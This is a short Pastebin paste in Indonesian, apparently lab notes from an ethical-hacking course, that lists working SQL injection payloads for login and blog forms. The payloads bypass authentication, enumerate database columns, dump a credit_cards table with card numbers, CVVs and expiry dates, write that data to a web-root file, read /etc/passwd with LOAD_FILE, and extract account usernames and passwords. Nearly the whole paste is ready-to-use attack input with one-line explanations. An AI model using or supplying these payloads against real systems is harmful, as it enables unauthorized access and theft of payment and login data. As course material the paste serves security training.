Advertisement
Guest User

Untitled

a guest
Mar 27th, 2016
143
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.38 KB | None | 0 0
  1. Part 1:
  2. Gambar 1:
  3. username = admin
  4. password = admin' or '1' = '1
  5.  
  6. Part 2:
  7. Gambar 2:
  8. berguna untuk mengetahui jumlah kolom
  9. username = admin
  10. password = ' union select count(*),null,null,null,null,null,null from INFORMATION_SCHEMA.COLUMNS where table_name='credit_cards--
  11.  
  12. Gambar 3:
  13. berguna untuk mengetahui nama2 kolom di tabel credit cards
  14. username = admin
  15. password = ' union select null,column_name,null,null,null,null,null from INFORMATION_SCHEMA.COLUMNS where table_name='credit_cards
  16.  
  17. Gambar 4:
  18. berguna untuk mengambil data
  19. username = admin
  20. password = ' union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards--
  21.  
  22. Gambar 5:
  23. berguna untuk menyimpan data ke file
  24. username = admin
  25. password = ' union select ccid,ccnumber,ccv,expiration,null,null,null from credit_cards into outfile '../../../var/www/html/CEH-WEEK7/halo.txt--
  26.  
  27. Part 3:
  28. Gambar 6:
  29. berguna untuk membaca file dari
  30. username = admin
  31. password = ' union select null, null, LOAD_FILE('../../../etc/passwd'), null,null, null, null--
  32.  
  33. Part 4:
  34. Gambar 7:
  35. berguna untuk login tanpa username
  36. username = admin' or '1' = '1'--
  37. password =
  38.  
  39. admin bisa diganti dengan kata apa saja
  40.  
  41. Part 5:
  42. Gambar 8:
  43. berguna untuk mengambil data saat menginsert blog
  44. Di form blog = Halo', '2012-12-12 12:12:12'), ('admin', (SELECT GROUP_CONCAT(username, ' ', password) from accounts), '2012-12-12 12:12:12');--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement